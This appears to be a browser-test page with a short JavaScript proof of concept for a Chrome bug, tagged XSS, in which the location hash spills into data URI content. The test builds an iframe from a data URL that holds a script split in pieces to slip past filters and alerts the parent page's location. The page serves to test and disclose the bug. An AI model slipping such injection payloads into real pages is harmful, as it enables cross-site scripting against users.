Location hash (aka. fragment) spills into data URI content

Chrome Bug 324251 - https://code.google.com/p/chromium/issues/detail?id=324251

By
skeptic_fx 1 Seen 678 times
Tags
bug hash xss
Run this test now.

Results

User Script (ENUM_FUNCTION)

					
function test(data){
	// We need to separate properties and access one by one.
try{
    
    var iFrame = document.createElement('iframe');
    iFrame.id = 'iFrameID';
    var url = "data:text/html;<h1>Test123</h1>#<scr"+ "ipt>alert(parent.window.location.href)</scr"+ "ipt>";
    iFrame.onload = function(){
        alert('Loaded');
    };
    iFrame.src = url;
    document.body.appendChild(iFrame);

}

catch(err){
	addResult('Some Error Occured :(');
}
}

					
				

Enum Data (ENUM_FUNCTION)

					
var data = [1];